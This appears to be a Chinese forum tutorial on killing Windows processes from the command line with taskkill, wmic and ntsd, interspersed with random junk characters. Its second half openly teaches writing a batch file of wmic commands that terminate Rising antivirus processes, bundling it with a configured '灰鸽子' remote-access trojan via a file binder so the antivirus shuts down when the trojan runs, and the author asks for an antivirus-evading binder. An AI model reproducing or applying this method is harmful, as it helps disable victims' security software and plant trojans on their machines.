软件简介:
0 |, K4 A% a: e/ z1 ]! r$ G大家好,我是桦香,今天我给大家做个教程:cmd下命令提示符下关进程+木马捆绑关杀毒软件批处理
) _& O7 N A) [+ o1 w% y* v! ?本来打算做个语音的,由于麦克风出了问题,所以只好多打点字了,为了节约时间,大部分的字我已经打好了.
1 Z$ Z4 W7 e9 O6 `8 D; `cmd下命令提示符下杀进程主要有三种方法:* @3 G: v' b) R8 K
1、用taskill命令
# B X7 v' k2 h! X* A: f$ n2 l ①taskkill /im 进程名称% L) o" `( ~: b3 K( J% G' y
示例:用taskkill /im VStart.exe命令关闭音速启动,VStart.exe就是音速启动的进程名称,下面看操作,执行了三次,成功关闭了音速启动,再看下面的方法.
8 B6 W5 M9 W4 a% D2 h + M. {4 V0 r- a- n
7 J$ H, i8 M# R; D' j; J ②taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程) + {& A1 s5 i9 g
注:有两种方法查进程的PID码:
8 h7 t p9 r3 u% N& B# }1 r9 {* {) _0 G ①在命令行下用 tasklist 命令查出进程的PID号码,就是这些$ z' p0 K W+ G. [8 y9 ^
②在任务管理器中的查看选项中选择选择列中勾先PID那一项$ n4 ^: ?4 M$ ^( q4 U' f
6 E( c) U9 U) Y f 示例:举个关闭迅雷的例子,先找出迅雷的PID码2552
* F3 A+ M; r% ?9 b. h taskkill /pid 2552 -f,就是这个指令,下面来运行一下看看.看到没有迅雷已经关闭了,再看下面的方法) ?8 ^" t( _9 h* L1 g( i, O$ W
2、用 wmic process where name=进程名称 call terminate 这个不需要知道进程的PID号
3 a3 d( A2 x2 l* M* Q 示例:
& R6 p* r% [% C z, x wmic process where name=iexplore.exe call terminate 关闭IE浏览器,我们来运行一下这条指令看看.看到了吧浏览器已经关闭了,再看下面的.
$ G7 C9 w" U; s) I1 T# A5 {
( o& w6 K6 n2 m- h/ R% |; j w3、ntsd -c q -p [pid进程码]
7 }( T, L* n( O# K% z$ B 示例:还是举个关闭迅雷的吧,同样先找出迅雷的PID码2724
4 [+ w1 x4 u2 A' D! B7 ^ ntsd -c q -p 2724 是这条指令,下面我们来执行一下看看.看到了吧,迅雷已经关闭了.
( h) v9 K. \4 l$ C5 ?: E这样关进程有什么作用呢?
1 {* _ I- V$ {& C' n一方面遇到不能用任务管理器结束的进程可以试试上面的方法,而且用wmic process where name=进程名称 call terminate和taskkill /im 进程名称这两条可以同时关闭多个进程名相同的进程,举个关2个QQ的例子吧,2 F( r) F: Z0 c# ] z0 N) A
已经打开了两个QQ程序,wmic process where name=QQ.exe call terminate,我们来执行一下看看,看到了吧,两个QQ都关闭了.
3 p! J8 w7 _4 ~" a$ w# f! I+ i6 ^; w6 q另一方面我们利用上面的命令可以做个关杀毒软件的批处理,然后把批处理文件和木马捆绑在一起,这样运行木马的时候就关闭了杀毒软件,下面看我操作
5 S! [ ]% j3 b( R1、先建立一个关闭杀毒软件进程的批处理文件,这里我以关闭瑞星为例,说明一下我的瑞星已经关闭了监控系统,所以这些就不用了:wmic process where name=RavTask.exe call terminate: i4 c! d; y, t/ z8 ?: O
wmic process where name=CCenter.exe call terminate
# n G- Q2 X+ f$ a- L6 twmic process where name=RavmonD.exe call terminate2 n2 I- O$ W' z) ]* y
wmic process where name=Ravmon.exe call terminate* a4 @7 D {. f+ B( N- A, i8 r. X8 Y
wmic process where name=RavStub.exe call terminate
( z8 J; G/ z1 z5 P$ J5 \: h9 H2、配置一个木马,配个鸽子吧
: B; t- @6 n7 l7 b3、用文件捆绑器将批处理文件和木马捆绑到一起,这里我随便找个文件捆绑器,不是免杀的,
. }' ^% R/ P! A2 i e W1 b已经捆绑好了
" X' I$ J, u6 m/ K. |/ z& v! e我们来运行一下捆绑后的文件5 h+ I) k# x3 i9 @
看到没有,瑞星已经关闭了,鸽子也上线了.我没有免杀的文件捆绑器,大家有的话,希望可以送个给我.8 L2 j$ W$ C( a+ }0 ?9 t2 P
下载地址:
|
最新整理Linux手工服务端_末世策略塔防手游
